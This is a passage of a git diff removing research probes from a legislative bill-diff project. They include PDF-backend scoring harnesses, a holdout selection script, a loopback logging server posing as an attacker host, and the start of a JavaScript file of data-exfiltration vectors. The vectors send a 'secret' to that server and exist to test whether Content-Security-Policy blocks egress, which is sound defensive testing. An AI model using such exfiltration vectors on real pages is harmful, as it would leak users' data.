old: Counter = Counter() - new: Counter = Counter() - for change in canonical.get("changes") or []: - text = change.get("text") or {} - old.update(_WORD.findall(norm_text(text.get("old")))) - new.update(_WORD.findall(norm_text(text.get("new")))) - return old, new - - -def change_signatures(canonical: dict) -> Counter: - """Multiset of (change_type, normalized old, normalized new) per the pre-registration.""" - return Counter( - ( - change.get("change_type"), - norm_text((change.get("text") or {}).get("old")), - norm_text((change.get("text") or {}).get("new")), - ) - for change in canonical.get("changes") or [] - ) - - -def is_material(signature: tuple) -> bool: - """PRE-REGISTRATION.md clause (c): whole-change presence, above a content floor.""" - _kind, old, new = signature - blob = f"{old} {new}" - if _AMOUNT_TOKEN.search(blob) or _SECTION_ID.search(blob): - return True - return len(blob.replace(" ", "")) >= _MATERIAL_MIN_CHARS - - -# ---------- pipeline drivers -------------------------------------------------- - - -def xml_canonical(v1_xml: Path, v2_xml: Path) -> dict: - v1, v2 = normalize_bill(v1_xml), normalize_bill(v2_xml) - diff_dict = bill_diff_to_dict(diff_bills(v1, v2), financial=True) - full_text, spans, tree = build_xml_full_text(v1, v2) - return xml_diff_to_canonical(diff_dict, full_text=full_text, full_text_spans=spans, tree=tree) - - -def pdf_canonical(backend: str, v1_pdf: Path, v2_pdf: Path, bill: str, mode: str) -> tuple[dict, dict]: - congress, chamber, number = bill.split("-") - timings = {} - pages = {} - for side, path in (("v1", v1_pdf), ("v2", v2_pdf)): - t0 = time.perf_counter() - raw, _summary = run_backend(backend, path) - timings[f"{side}_extract_s"] = round(time.perf_counter() - t0, 3) - pages[side], _diag = reconstruct(raw, repaired=(mode == "repaired")) - - # Apply the SAME guard production applies. `compare/pdf.py` declines an unnumbered - # (enrolled) layout with UnsupportedLayoutError before diffing, because every anchor - # path gates on a printed line number, so an enrolled bill collapses into one - # anchorless block and the diff returns a confident wrong answer rather than failing. - # - # Calling `diff_pdfs` directly bypasses that guard, and this harness originally did. - # The result was exactly the failure the guard exists to prevent: on 118-hr-4366/5->6 - # the PDF side reported 3468 amount entries against the XML's 0, and on - # 115-hr-5895/4->5 it matched only 47 of 164. Both pairs end in an enrolled bill. - # Scoring a backend on a document the product declines measures nothing about the - # backend, so those pairs are marked declined rather than silently scored. - declined = [side for side in ("v1", "v2") if _is_unnumbered_layout(pages[side])] - if declined: - raise UnsupportedLayoutError( - f"unnumbered (enrolled) layout on {'+'.join(declined)}; production declines this pair" - ) - - t0 = time.perf_counter() - diff = diff_pdfs(pages["v1"], pages["v2"]) - timings["diff_s"] = round(time.perf_counter() - t0, 3) - - text_v1, off_v1 = pdf_full_text(pages["v1"]) - text_v2, off_v2 = pdf_full_text(pages["v2"]) - canonical = pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": text_v1, "v2": text_v2}, - line_offsets={"v1": off_v1, "v2": off_v2}, - ) - return canonical, timings - - -def corpus_pairs() -> list[tuple[str, int, int, Path, Path, Path, Path]]: - """Consecutive version pairs carrying both formats on both sides (ADR 0015).""" - out = [] - for d in sorted((REPO / "tests" / "corpus").iterdir()): - if not d.is_dir(): - continue - stems: dict[int, dict[str, Path]] = {} - for f in d.iterdir(): - m = re.match(r"(\d+)_([a-z-]+)\.(pdf|xml)$", f.name) - if m: - stems.setdefault(int(m.group(1)), {})[m.group(3)] = f - both = sorted(n for n, formats in stems.items() if {"pdf", "xml"} <= formats.keys()) - for a, b in zip(both, both[1:]): - if b == a + 1: - out.append((d.name, a, b, stems[a]["pdf"], stems[b]["pdf"], stems[a]["xml"], stems[b]["xml"])) - return out - - -def compare(pdf_canon: dict, xml_canon: dict) -> dict: - pdf_amounts, xml_amounts = amount_triples(pdf_canon), amount_triples(xml_canon) - pdf_sigs, xml_sigs = change_signatures(pdf_canon), change_signatures(xml_canon) - pdf_old, pdf_new = changed_text_tokens(pdf_canon) - xml_old, xml_new = changed_text_tokens(xml_canon) - - only_pdf = pdf_sigs - xml_sigs - only_xml = xml_sigs - pdf_sigs - material = [s for s in (only_pdf + only_xml) if is_material(s)] - - return { - "T1_change_signatures": prf(xml_sigs, pdf_sigs), - "T1b_changed_tokens_old": prf(xml_old, pdf_old), - "T1b_changed_tokens_new": prf(xml_new, pdf_new), - "T2_amount_entries": prf(xml_amounts, pdf_amounts), - "T3_material_disagreements": len(material), - "T3_sample": [{"kind": s[0], "old": s[1][:180], "new": s[2][:180]} for s in material[:8]], - "context": { - "n_changes_pdf": len(pdf_canon.get("changes") or []), - "n_changes_xml": len(xml_canon.get("changes") or []), - "n_amount_entries_pdf": sum(pdf_amounts.values()), - "n_amount_entries_xml": sum(xml_amounts.values()), - }, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--backends", default=",".join(ALL_BACKENDS)) - ap.add_argument("--modes", default="strict,repaired") - ap.add_argument("--limit-pairs", type=int, default=None) - args = ap.parse_args() - - backends = args.backends.split(",") - if backends[0] != "pdfium-native": - backends = ["pdfium-native"] + [b for b in backends if b != "pdfium-native"] - modes = args.modes.split(",") - - pairs = corpus_pairs() - if args.limit_pairs: - pairs = pairs[: args.limit_pairs] - print(f"{len(pairs)} pairs x {len(backends)} backends x {len(modes)} modes", file=sys.stderr) - - out: dict = {"pairs": {}, "n_pairs": len(pairs), "backends": backends} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, a, b, pdf1, pdf2, xml1, xml2) in enumerate(pairs, 1): - key = f"{bill}/{a}->{b}" - out["pairs"][key] = {} - try: - xml_canon = xml_canonical(xml1, xml2) - except Exception as exc: - out["pairs"][key]["_xml_error"] = f"{type(exc).__name__}: {exc}" - print(f" [{i}/{len(pairs)}] {key} XML ERROR {exc}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - continue - - for mode in modes: - incumbent_canon = None - for backend in backends: - slot = f"{backend}/{mode}" - try: - canon, timings = pdf_canonical(backend, pdf1, pdf2, bill, mode) - entry = compare(canon, xml_canon) - entry["timings"] = timings - if backend == "pdfium-native": - incumbent_canon = canon - entry["T4_vs_incumbent"] = None - else: - # T4: hold the whole downstream pipeline fixed, vary only glyphs. - entry["T4_vs_incumbent"] = { - "change_signatures": prf(change_signatures(incumbent_canon), change_signatures(canon)), - "amount_entries": prf(amount_triples(incumbent_canon), amount_triples(canon)), - "identical_changes": change_signatures(incumbent_canon) == change_signatures(canon), - "identical_amounts": amount_triples(incumbent_canon) == amount_triples(canon), - } - out["pairs"][key][slot] = entry - note = ( - f"amtF1={entry['T2_amount_entries']['f1']:.3f} " - f"chgF1={entry['T1_change_signatures']['f1']:.3f} " - f"mat={entry['T3_material_disagreements']}" - ) - if entry["T4_vs_incumbent"]: - note += ( - f" | vs_inc amt={entry['T4_vs_incumbent']['identical_amounts']}" - f" chg={entry['T4_vs_incumbent']['identical_changes']}" - ) - except Exception as exc: - out["pairs"][key][slot] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-1200:], - } - note = "ERROR" - print(f" [{i}/{len(pairs)}] {key:<24} {slot:<24} {note}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_tierb.py b/docs/research/pdf-backend-bakeoff/probes/score_tierb.py deleted file mode 100644 index 64177d9b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_tierb.py +++ /dev/null @@ -1,132 +0,0 @@ -"""Tier B (partial): robustness on non-canonical documents with NO XML reference. - -WHAT THIS IS, AND WHAT IT IS NOT. The spec's Tier B asks for pre-publication material -- -committee prints, chair's marks, discussion drafts. **The repository contains none, and -this probe does not manufacture any.** What it covers is the nearest available material: - - * `tests/data/CRPT-118srpt198.pdf` a watermarked COMMITTEE REPORT, a genuinely - different document class from a bill - * `tests/data/BILLS-118s4795rs.pdf` a watermarked Senate bill - * `tests/data/subcommittee/*.pdf` nine GPO-published House-reported prints, which - the spec correctly classifies as additional TIER A - print-class variety rather than Tier B - -So this closes the spec's explicit request to include the watermarked Senate document and -the committee report, and it widens print-class coverage. It does NOT close the Tier B -gap, and the results must not be read as if it did. - -THE METRIC. There is no XML for any of these, so PDF-vs-XML is unavailable. The measure -is backend-vs-incumbent through the identical downstream pipeline, which is the same -structure-free instrument Phase 2 calls T4: the entire pipeline is held fixed and only -the glyph source varies, so any difference is attributable to the backend and needs no -adjudication. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_tierb.py \ - --out docs/research/pdf-backend-bakeoff/results/tierb.json -""" - -from __future__ import annotations - -import argparse -import json -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.parsers.pdf_anchors import breadcrumb_for, extract_anchors # noqa: E402 - -INCUMBENT = "pdfium-native" - - -def documents() -> list[Path]: - out = [REPO / "tests/data/CRPT-118srpt198.pdf", REPO / "tests/data/BILLS-118s4795rs.pdf"] - out += sorted((REPO / "tests/data/subcommittee").glob("*.pdf")) - return [p for p in out if p.exists()] - - -def profile(pdf: Path, backend: str) -> dict: - t0 = time.perf_counter() - raw, summary = run_backend(backend, pdf) - extract_s = time.perf_counter() - t0 - pages, diag = reconstruct(raw, repaired=True) - anchors = extract_anchors(pages) - return { - "extract_s": round(extract_s, 3), - "n_pages": len(pages), - "reconstruction": diag, - "text": "\n".join(p.text for p in pages), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - "n_anchors": len(anchors), - "anchor_kinds": dict(Counter(a.kind for a in anchors)), - "breadcrumbs": [tuple(breadcrumb_for(a, anchors)) for a in anchors], - "glyphs": summary.get("glyphs"), - "undecodable_glyphs": summary.get("undecodable_glyphs", 0), - } - - -def compare(ref: dict, cand: dict) -> dict: - rl, cl = set(ref["line_numbers"]), set(cand["line_numbers"]) - rb, cb = Counter(ref["breadcrumbs"]), Counter(cand["breadcrumbs"]) - return { - "text_identical": ref["text"] == cand["text"], - "line_numbers_identical": rl == cl, - "line_number_recall": round(len(rl & cl) / len(rl), 5) if rl else None, - "anchors_ref": ref["n_anchors"], - "anchors_cand": cand["n_anchors"], - "breadcrumb_agreement": (round(sum((rb & cb).values()) / sum(rb.values()), 5) if sum(rb.values()) else None), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - args = ap.parse_args() - - docs = documents() - print(f"{len(docs)} non-corpus documents x {len(ALL_BACKENDS)} backends", file=sys.stderr) - out: dict = {"documents": {}, "n_documents": len(docs), "note": __doc__.split("\n\n")[1]} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, pdf in enumerate(docs, 1): - key = pdf.relative_to(REPO).as_posix() - out["documents"][key] = {} - ref = None - for backend in [INCUMBENT] + [b for b in ALL_BACKENDS if b != INCUMBENT]: - try: - prof = profile(pdf, backend) - if backend == INCUMBENT: - ref = prof - entry = {k: v for k, v in prof.items() if k not in ("text", "line_numbers", "breadcrumbs")} - entry["vs_incumbent"] = None if backend == INCUMBENT else compare(ref, prof) - out["documents"][key][backend] = entry - note = ( - f"pages={prof['n_pages']} anchors={prof['n_anchors']}" - if backend == INCUMBENT - else f"text_identical={entry['vs_incumbent']['text_identical']} " - f"crumbs={entry['vs_incumbent']['breadcrumb_agreement']}" - ) - except Exception as exc: - out["documents"][key][backend] = {"error": f"{type(exc).__name__}: {exc}"} - out["documents"][key][backend]["traceback"] = traceback.format_exc()[-800:] - note = "ERROR" - print(f" [{i}/{len(docs)}] {key:<44} {backend:<14} {note}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/select_holdout.py b/docs/research/pdf-backend-bakeoff/probes/select_holdout.py deleted file mode 100644 index dd3a9a15..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/select_holdout.py +++ /dev/null @@ -1,363 +0,0 @@ -"""Execute the frozen P2 holdout selection procedure. - -PRE-REGISTRATION-CONFIRMATORY.md, "P2 -- holdout corpus". This script implements that -procedure literally and writes results/holdout_membership.json. It does NOT score anything. - -Frame: govinfo BILLSTATUS, Congresses 113-119, all 8 bill types. -Eligible: >= 2 text versions that EACH carry both PDF and XML at content/pkg. -Exclusions: the 30 replication bills; every non-corpus probe fixture; every bill in the - main checkout's bills/ working tree. -Strata: 8, filled in fixed order, one bill each unless stated. -Selection: within a stratum, candidates sorted by bill id, permuted with seed 20260805, - first that satisfies the stratum predicate AND the format rule. -""" - -from __future__ import annotations - -import hashlib -import io -import json -import os -import random -import re -import sys -import xml.etree.ElementTree as ET -import zipfile -from pathlib import Path - -import httpx - -REPO = Path(__file__).resolve().parent.parents[3] -sys.path.insert(0, str(REPO / "tools")) -from fetch_govinfo import order_versions # noqa: E402 - -MAIN = REPO.parents[2] if (REPO.parents[2] / "bills").exists() else REPO -TMP = Path(os.environ["CLAUDE_JOB_DIR"]) / "tmp" -BS = Path(os.environ.get("BAKEOFF_BILLSTATUS", TMP / "billstatus")) -OUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/results" -HOLDOUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/holdout" - -SEED = 20260805 -APPROPS_CODES = {"hsap00", "ssap00"} -CONTENT = "https://www.govinfo.gov/content/pkg" - -# Version codes by class, for the strata that name them. -WATERMARKED_SENATE = {"rs", "pcs"} -AMENDMENT_PRINT = {"eah", "eas"} - - -def bill_id(congress: str, btype: str, number: str) -> str: - return f"{congress}-{btype}-{number}" - - -def pkg_urls(pkg: str) -> tuple[str, str]: - return f"{CONTENT}/{pkg}/xml/{pkg}.xml", f"{CONTENT}/{pkg}/pdf/{pkg}.pdf" - - -_PKG_RE = re.compile(r"/(BILLS-\d+[a-z]+\d+[a-z0-9]+)\.(?:xml|htm|pdf)\b", re.I) -_CODE_RE = re.compile(r"^BILLS-\d+[a-z]+\d+([a-z][a-z0-9]*)$", re.I) - - -def parse_bill(root: ET.Element) -> dict | None: - b = root.find("bill") - if b is None: - return None - congress = (b.findtext("congress") or "").strip() - btype = (b.findtext("type") or "").strip().lower() - number = (b.findtext("billNumber") or b.findtext("number") or "").strip() - if not (congress and btype and number): - return None - - # Committee referral codes back the appropriations facet. The element is - # committees/item (with a legacy committees/billCommittees/item layout); an earlier - # version of this script walked b.iter("committee"), which matches nothing in - # BILLSTATUS and flagged 0 of 108,121 bills as appropriations -- emptying stratum 4 - # and making real scarcity indistinguishable from a parse bug. Use the repo's own - # accessor rather than a second implementation of it. - items = b.findall("committees/item") or b.findall("committees/billCommittees/item") - codes = {(it.findtext("systemCode") or "").strip().lower() for it in items} - codes.discard("") - - versions: list[dict] = [] - tv = b.find("textVersions") - if tv is not None: - for item in tv.findall("item"): - pkg = None - for f in item.iter("item"): - u = (f.findtext("url") or "").strip() - m = _PKG_RE.search(u) - if m: - pkg = m.group(1) - break - if pkg is None: - for u_el in item.iter("url"): - m = _PKG_RE.search((u_el.text or "").strip()) - if m: - pkg = m.group(1) - break - if pkg is None: - continue - m = _CODE_RE.match(pkg) - code = m.group(1).lower() if m else "" - versions.append({"pkg": pkg, "code": code, "date": (item.findtext("date") or "").strip()}) - - # de-dup by package id, then order with the repo's own authority (BILLSTATUS date, - # tier as tie-break) so the holdout numbers versions exactly as the corpus does. - seen, uniq = set(), [] - for v in versions: - if v["pkg"] in seen: - continue - seen.add(v["pkg"]) - uniq.append(v) - by_code = {v["code"]: v for v in uniq if v["code"]} - try: - ordered = order_versions((c, v["date"]) for c, v in by_code.items()) - uniq = [by_code[c] for c, _d, _t in ordered if c in by_code] - except Exception: - pass - - title = (b.findtext("title") or "").strip() - return { - "bill_id": bill_id(congress, btype, number), - "congress": int(congress), - "type": btype, - "number": int(number) if number.isdigit() else number, - "title": title, - "appropriations": bool(codes & APPROPS_CODES), - "versions": uniq, - } - - -def load_frame() -> list[dict]: - bills: list[dict] = [] - zips = sorted(BS.glob("BILLSTATUS-*.zip")) - for z in zips: - try: - zf = zipfile.ZipFile(z) - except zipfile.BadZipFile: - print(f" BAD ZIP {z.name}", file=sys.stderr) - continue - n = 0 - for name in zf.namelist(): - if not name.lower().endswith(".xml"): - continue - try: - rec = parse_bill(ET.parse(io.BytesIO(zf.read(name))).getroot()) - except ET.ParseError: - continue - if rec: - bills.append(rec) - n += 1 - print(f" {z.name}: {n} bills", file=sys.stderr) - return bills - - -def excluded_bill_ids() -> dict[str, list[str]]: - repl = sorted({p.name for p in (REPO / "tests/corpus").iterdir() if p.is_dir()}) - probes = ["118-s-4795"] - for p in sorted((REPO / "tests/data/subcommittee").glob("*.pdf")): - m = re.match(r"BILLS-(\d+)([a-z]+)(\d+)([a-z0-9]+)", p.name) - if m: - probes.append(bill_id(m.group(1), m.group(2), m.group(3))) - main_tree = sorted({p.name for p in MAIN.joinpath("bills").iterdir() if p.is_dir()}) - return { - "replication_corpus": repl, - "non_corpus_probe_fixtures": sorted(set(probes)), - "main_checkout_bills_tree": main_tree, - } - - -def head_ok(client: httpx.Client, url: str) -> bool: - try: - r = client.head(url, follow_redirects=True, timeout=30) - return r.status_code == 200 - except httpx.HTTPError: - return False - - -def dual_format_versions(client: httpx.Client, rec: dict, cache: dict) -> list[dict]: - """Versions whose XML *and* PDF both exist at content/pkg. Verified, not assumed.""" - out = [] - for v in rec["versions"]: - key = v["pkg"] - if key not in cache: - xu, pu = pkg_urls(key) - cache[key] = head_ok(client, xu) and head_ok(client, pu) - if cache[key]: - out.append(v) - return out - - -# ---- strata ------------------------------------------------------------------ - -STRATA = [ - {"id": 1, "name": "non-appropriations House bill, 118th or 119th", "n": 2, - "pred": lambda r: (not r["appropriations"]) and r["type"] == "hr" and r["congress"] in (118, 119)}, - {"id": 2, "name": "non-appropriations Senate bill", "n": 2, - "pred": lambda r: (not r["appropriations"]) and r["type"] == "s"}, - {"id": 3, "name": "joint resolution (hjres/sjres)", "n": 1, - "pred": lambda r: r["type"] in ("hjres", "sjres")}, - {"id": 4, "name": "appropriations bill from 113/114/116/119", "n": 2, - "pred": lambda r: r["appropriations"] and r["congress"] in (113, 114, 116, 119)}, - {"id": 5, "name": "longest version < 20 printed pages", "n": 2, "pages": ("lt", 20), - "pred": lambda r: True}, - {"id": 6, "name": "longest version > 400 printed pages", "n": 1, "pages": ("gt", 400), - "pred": lambda r: True}, - {"id": 7, "name": "watermarked Senate print (rs/pcs)", "n": 1, - "pred": lambda r: r["type"] == "s" and any(v["code"] in WATERMARKED_SENATE for v in r["versions"])}, - {"id": 8, "name": "chamber-crossing amendment print (eah/eas)", "n": 1, - "pred": lambda r: any(v["code"] in AMENDMENT_PRINT for v in r["versions"])}, -] - - -def page_count(path: Path) -> int: - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(path)) - try: - return len(doc) - finally: - doc.close() - - -def download(client: httpx.Client, url: str, dest: Path) -> str: - dest.parent.mkdir(parents=True, exist_ok=True) - r = client.get(url, follow_redirects=True, timeout=300) - r.raise_for_status() - dest.write_bytes(r.content) - return hashlib.sha256(r.content).hexdigest() - - -def main() -> None: - print("loading frame...", file=sys.stderr) - frame = load_frame() - print(f"frame: {len(frame)} bills", file=sys.stderr) - - excl = excluded_bill_ids() - excl_all = set().union(*excl.values()) - eligible_ids = {r["bill_id"] for r in frame} - - # Candidate pool: >= 2 versions carrying a BILLS package (dual-format verified lazily). - pool = [r for r in frame if len(r["versions"]) >= 2 and r["bill_id"] not in excl_all] - print(f"pool (>=2 pkg versions, not excluded): {len(pool)}", file=sys.stderr) - - client = httpx.Client(headers={"User-Agent": "DeltaTrack-bakeoff-holdout/1.0"}) - fmt_cache: dict[str, bool] = {} - chosen: dict[str, dict] = {} - taken: set[str] = set() - strata_report = [] - - for st in STRATA: - cands = sorted([r for r in pool if st["pred"](r) and r["bill_id"] not in taken], - key=lambda r: r["bill_id"]) - rng = random.Random(SEED) - order = list(range(len(cands))) - rng.shuffle(order) - filled, examined = [], 0 - for idx in order: - if len(filled) >= st["n"]: - break - rec = cands[idx] - examined += 1 - dual = dual_format_versions(client, rec, fmt_cache) - if len(dual) < 2: - continue - if "pages" in st: - op, lim = st["pages"] - probe = dual[-1] if op == "gt" else dual[0] - _, pu = pkg_urls(probe["pkg"]) - tmp = HOLDOUT_DIR / "_probe" / f"{probe['pkg']}.pdf" - try: - download(client, pu, tmp) - pc = page_count(tmp) - except Exception as exc: - print(f" probe fail {rec['bill_id']}: {exc}", file=sys.stderr) - continue - if (op == "lt" and not pc < lim) or (op == "gt" and not pc > lim): - continue - rec = {**rec, "_probe_pages": pc} - rec = {**rec, "_dual": dual} - filled.append(rec) - taken.add(rec["bill_id"]) - print(f" stratum {st['id']}: {rec['bill_id']} ({len(dual)} dual-format versions)", file=sys.stderr) - for rec in filled: - chosen[rec["bill_id"]] = {**rec, "stratum": st["id"]} - strata_report.append({ - "stratum": st["id"], "name": st["name"], "target": st["n"], - "filled": [r["bill_id"] for r in filled], "candidates": len(cands), - "examined": examined, - }) - print(f"stratum {st['id']} ({st['name']}): {len(filled)}/{st['n']}", file=sys.stderr) - - # Download every selected bill's dual-format versions. - members = [] - for bid, rec in sorted(chosen.items()): - files = [] - for i, v in enumerate(rec["_dual"], 1): - xu, pu = pkg_urls(v["pkg"]) - xd = HOLDOUT_DIR / bid / f"{i}_{v['code']}.xml" - pd = HOLDOUT_DIR / bid / f"{i}_{v['code']}.pdf" - try: - xs = download(client, xu, xd) - ps = download(client, pu, pd) - except Exception as exc: - print(f" DOWNLOAD FAIL {bid} {v['pkg']}: {exc}", file=sys.stderr) - continue - files.append({ - "index": i, "pkg": v["pkg"], "code": v["code"], "date": v["date"], - "xml": {"path": str(xd.relative_to(HOLDOUT_DIR)), "sha256": xs, "bytes": xd.stat().st_size}, - "pdf": {"path": str(pd.relative_to(HOLDOUT_DIR)), "sha256": ps, "bytes": pd.stat().st_size, - "pages": page_count(pd)}, - }) - members.append({ - "bill_id": bid, "stratum": rec["stratum"], "congress": rec["congress"], - "type": rec["type"], "number": rec["number"], "title": rec["title"], - "appropriations": rec["appropriations"], "versions": files, - }) - print(f" downloaded {bid}: {len(files)} versions", file=sys.stderr) - - filled_strata = sum(1 for s in strata_report if len(s["filled"]) == s["target"]) - adequacy = ("generalization" if filled_strata == 8 - else "sampled-classes-only" if filled_strata >= 5 - else "UNOBTAINABLE -- downgrade to locked-protocol replication") - - doc = { - "protocol": "PRE-REGISTRATION-CONFIRMATORY.md, P2 holdout corpus", - "seed": SEED, - "generation_note": ( - "Generated twice. The first run walked b.iter('committee') for committee " - "referral codes, which matches nothing in BILLSTATUS: 0 of 108,121 bills were " - "flagged appropriations and stratum 4 reported 0 candidates, which reads " - "identically to real scarcity. Corrected to committees/item (the accessor " - "tools/fetch_govinfo.py already had) and regenerated in full, because filling " - "stratum 4 removes its picks from the pools of strata 5-8 that follow it. " - "NOTHING WAS SCORED from the first output and it was never committed; this " - "file is the only membership that has ever existed in git." - ), - "frame": { - "source": "govinfo BILLSTATUS bulk data", - "congresses": [113, 114, 115, 116, 117, 118, 119], - "bill_types": ["hr", "s", "hjres", "sjres", "hconres", "sconres", "hres", "sres"], - "zips": sorted(p.name for p in BS.glob("BILLSTATUS-*.zip")), - "bills_parsed": len(frame), - "pool_after_exclusions": len(pool), - }, - "exclusions": {k: v for k, v in excl.items()}, - "exclusions_total": len(excl_all), - "exclusions_present_in_frame": sorted(excl_all & eligible_ids), - "strata": strata_report, - "strata_fully_filled": filled_strata, - "adequacy": adequacy, - "members": members, - "n_bills": len(members), - "n_documents": sum(len(m["versions"]) for m in members), - } - OUT_DIR.mkdir(parents=True, exist_ok=True) - dest = OUT_DIR / "holdout_membership.json" - dest.write_text(json.dumps(doc, indent=1)) - print(f"\nwrote {dest}", file=sys.stderr) - print(f"strata fully filled: {filled_strata}/8 -> {adequacy}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/serve.py b/docs/research/pdf-backend-bakeoff/probes/serve.py deleted file mode 100644 index 3d8d2878..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/serve.py +++ /dev/null @@ -1,110 +0,0 @@ -"""Logging server standing in for an attacker-controlled host. - -Everything is loopback, so nothing leaves this machine, but from the browser's point of -view it is a different origin than `null`. - -Two listeners, not one. The predecessor probe spoke only HTTP, which meant a WebRTC STUN -attempt could not have appeared in its log *regardless of whether the browser made one* -- -a check structurally incapable of firing, which reads identically to a pass. The UDP -listener closes that: a STUN binding request is a UDP datagram, and any datagram arriving -on the port is recorded. - -Assert on what the SERVER received, never on whether JavaScript threw. Under CSP most -vectors report `attempted` with no exception; they simply produce no request. -""" - -from __future__ import annotations - -import argparse -import http.server -import json -import socket -import socketserver -import threading -import time - -HITS: list[dict] = [] -_LOCK = threading.Lock() - - -def record(kind: str, detail: str) -> None: - with _LOCK: - HITS.append({"kind": kind, "detail": detail, "t": round(time.time(), 3)}) - print(f" EGRESS OBSERVED [{kind}] {detail[:110]}", flush=True) - - -class Handler(http.server.BaseHTTPRequestHandler): - def _log_and_ok(self, verb: str) -> None: - body = b"x" - record("http", f"{verb} {self.path}") - self.send_response(200) - # Permissive CORS so a CORS failure can never be mistaken for the reason a - # request did or did not arrive. CORS gates reading the RESPONSE, not sending - # the REQUEST, and is not an egress control. - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header("Content-Type", "image/gif") - self.send_header("Content-Length", str(len(body))) - self.end_headers() - self.wfile.write(body) - - def do_GET(self) -> None: - self._log_and_ok("GET") - - def do_POST(self) -> None: - self._log_and_ok("POST") - - def do_PUT(self) -> None: - self._log_and_ok("PUT") - - def log_message(self, *_a) -> None: - pass - - -def udp_listener(port: int, stop: threading.Event) -> None: - """Catch STUN (and anything else) on the same port number, over UDP. - - A STUN binding request carries the 0x2112A442 magic cookie at offset 4, which is - enough to label it rather than report a bare datagram. - """ - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - sock.bind(("127.0.0.1", port)) - sock.settimeout(0.5) - while not stop.is_set(): - try: - data, addr = sock.recvfrom(4096) - except (TimeoutError, socket.timeout): - continue - except OSError: - break - label = "stun" if len(data) >= 8 and data[4:8] == b"\x21\x12\xa4\x42" else "udp" - record(label, f"{len(data)} bytes from {addr[0]}:{addr[1]}") - sock.close() - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--port", type=int, default=8973) - ap.add_argument("--seconds", type=float, default=120) - ap.add_argument("--dump", default=None, help="write observed hits as JSON on exit") - args = ap.parse_args() - - stop = threading.Event() - socketserver.TCPServer.allow_reuse_address = True - with socketserver.TCPServer(("127.0.0.1", args.port), Handler) as httpd: - threading.Thread(target=httpd.serve_forever, daemon=True).start() - threading.Thread(target=udp_listener, args=(args.port, stop), daemon=True).start() - print(f"listening on 127.0.0.1:{args.port} (tcp+udp)", flush=True) - try: - time.sleep(args.seconds) - except KeyboardInterrupt: - pass - stop.set() - if args.dump: - with open(args.dump, "w") as fh: - json.dump(HITS, fh, indent=1) - print(f"total hits: {len(HITS)}", flush=True) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/vectors.js b/docs/research/pdf-backend-bakeoff/probes/vectors.js deleted file mode 100644 index 2ecdc2fb..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/vectors.js +++ /dev/null @@ -1,145 +0,0 @@ -// Every exfiltration mechanism a page can attempt, each tagged so the receiving server -// says which ones actually established egress. -// -// CODEQL: this file deliberately trips `js/functionality-from-untrusted-source` twice, at -// the `script` and `iframe` vectors below (alerts #6 and #7 on PR #553, "Script/Iframe -// loaded using unencrypted connection"). Both are the thing under test, not a defect: -// -// - This is attack-vector code. Its entire job is to attempt loading executable content -// from a remote origin, so that `confirm_egress.py` / `redteam_egress2.py` can prove -// Content-Security-Policy blocks it. A vector that could not attempt the load would -// measure nothing, and a probe rewritten to satisfy the rule would silently stop -// testing `script-src` and `frame-src` -- the two directives these vectors exist for. -// - The "untrusted source" is `http://127.0.0.1:8973`, the harness's own logging server -// (`serve.py`, which binds 127.0.0.1 on TCP and UDP). Nothing is fetched from a third -// party and no traffic leaves the machine. -// - Plain HTTP is required, not incidental. The measurement is whether the request is -// issued at all; TLS to a loopback listener would add a certificate to the harness -// without changing what is observed. -// -// None of this ships: the file is a research probe under docs/research/, never imported by -// src/deltatrack, and never served to a user. -// -// The returned string reports what the PAGE saw (attempted / threw). That is diagnostic -// only. The claim is decided by what the SERVER received: under CSP most of these report -// `attempted` with no JavaScript exception and simply produce no request, so a harness -// that checked for thrown errors would report exfiltration as SUCCEEDING. -// -// Vectors the predecessor fixture did not conclusively test, closed here: -// - form submission: it built a form and never called submit(), so the vector was -// listed as covered while never having been fired. It now submits into a hidden -// same-page iframe, which exercises `form-action` without navigating the page away. -// - webrtc: unchanged here, but the logging server now also listens on UDP, so a STUN -// binding request can be observed at all. Previously it could not have been. -// - service-worker registration, worker-originated fetch, @import and webfont loads. -window.__tryAll = async function (tag) { - const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=BILLTEXT`; - const out = []; - const t = async (name, fn) => { - try { - await fn(); - out.push(name + ":attempted"); - } catch (e) { - out.push(name + ":threw(" + e.name + ")"); - } - }; - - await t("fetch", () => fetch(U("fetch"), { mode: "no-cors" })); - await t("xhr", () => { - const x = new 